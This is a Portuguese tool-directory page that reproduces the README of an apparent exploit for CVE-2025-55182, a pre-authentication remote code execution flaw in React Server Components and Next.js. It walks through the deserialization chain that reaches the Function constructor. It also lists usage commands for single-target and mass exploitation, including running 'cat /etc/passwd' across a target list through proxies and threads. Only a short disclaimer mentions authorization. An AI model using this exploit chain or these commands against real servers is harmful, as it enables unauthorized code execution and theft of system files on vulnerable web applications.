Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — Exploit de execução remota de código sem pré-autenticação para React Server Components e Next.js via vulnerabilidade de desserialização. Suporta varredura de alvo único e em lote com proxy e threads. | Kitploit
Ferramentas/GitHubGitHub/luoluoqingge/cve-2025-55182
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubluoluoqingge/cve-2025-55182

CVE-2025-55182

Exploit de execução remota de código sem pré-autenticação para React Server Components e Next.js via vulnerabilidade de desserialização. Suporta varredura de alvo único e em lote com proxy e threads.

Ver Repositório
15há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 - React2Shell

React Server Components / Next.js Execução Remota de Código sem Autenticação

PropriedadeValor
CVE IDCVE-2025-55182
CVSS10.0 (Crítico)
CWECWE-502: Desserialização de Dados Não Confiáveis
TipoPre-Auth RCE

Impacto

ComponenteVersões Afetadas
React19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js15.0.0 ~ 15.0.4, 15.1.0 ~ 15.1.8, 15.2.x ~ 15.5.6, 16.0.0 ~ 16.0.6
Pacotes Relacionadosreact-server-dom-webpack, react-server-dom-turbopack, react-server-dom-parcel

Princípio da Vulnerabilidade

Esta vulnerabilidade explora uma falha de desserialização no protocolo Flight dos React Server Components (RSC), alcançando execução remota de código não autorizada através da construção de uma requisição multipart/form-data maliciosa. A cadeia de exploração completa é a seguinte:

  1. Através de POST multipart/form-data combinado com o cabeçalho Next-Action, aciona o caminho de Server Action.
  2. O Chunk "0" contém um objeto JSON cuidadosamente construído (não encapsulado em array), $1:__proto__:then acessa Chunk.prototype.then no objeto Chunk 1 em estado PENDING, tornando-o um thenable.
  3. $1:constructor:constructor é resolvido via cadeia de protótipos para o construtor Function.
  4. Chunk.prototype.then chama initializeModelChunk para analisar o campo value '{"then":"$B0"}'.
  5. A análise do blob $B0 chama _formData.get(_prefix + "0"), ou seja, Function(code + "0").
  6. O objeto de função retornado possui uma propriedade then própria, é tratado como um thenable e invocado, acionando a execução de código, resultando em RCE.

Instalação de Dependências

pip install requests[socks]

O script tentará instalar automaticamente requests e PySocks se estiverem faltando.

Uso

RCE em Alvo Único

python CVE-2025-55182.py -u http://target:3000 -c "id"

Exploração em Massa

python CVE-2025-55182.py -f targets.txt -c "cat /etc/passwd" -o results.txt

Apenas Verificação de Vulnerabilidade (sem executar comandos)

python CVE-2025-55182.py -u http://target:3000 --check
python CVE-2025-55182.py -f targets.txt --check -o vuln_hosts.txt

Usando Proxy

# Proxy HTTP
python CVE-2025-55182.py -u http://target:3000 -c "whoami" --proxy http://127.0.0.1:8080

# Proxy SOCKS5
python CVE-2025-55182.py -f targets.txt -c "id" --proxy socks5://127.0.0.1:1080

Modo de Depuração

python CVE-2025-55182.py -u http://target:3000 -c "id" -v

Descrição Completa dos Parâmetros

ParâmetroDescriçãoValor Padrão
-u, --urlURL de um único alvo (mutualmente exclusivo com -f)-
-f, --fileArquivo com lista de URLs de alvos, um por linha (mutualmente exclusivo com -u)-
-c, --commandComando do sistema a ser executado (não obrigatório no modo --check)-
-o, --outputArquivo de saída dos resultadosresults.txt
-t, --threadsNúmero de threads concorrentes10
-v, --verboseExibe saída de depuraçãoFalse
--proxyEndereço do proxy, suporta HTTP e SOCKS5-
--timeoutTempo limite da requisição (segundos)15
--checkApenas verifica a vulnerabilidade, não executa comandos do sistemaFalse
--verify-sslVerificar certificado TLSFalse

Descrição da Saída

  • VULN — O alvo está vulnerável, resultado da execução do comando obtido com sucesso
  • MAYBE — Possivelmente vulnerável (ex.: timeout de leitura)
  • ERR — Erro de conexão
  • SAFE — Nenhuma vulnerabilidade detectada

Os resultados da varredura em massa são gravados no arquivo de saída especificado por -o, registrando apenas os alvos confirmados como vulneráveis.

Exemplo de Formato targets.txt

http://192.168.1.10:3000
https://app.example.com
http://10.0.0.5:3000/dashboard
# Linhas de comentário são ignoradas

Aviso Legal

Esta ferramenta é destinada apenas para testes de segurança autorizados e fins de pesquisa em segurança. O usuário deve garantir que obteve autorização explícita do proprietário do sistema alvo. Realizar testes de penetração sem autorização é ilegal, e o usuário assume toda a responsabilidade legal.

Baixar ferramenta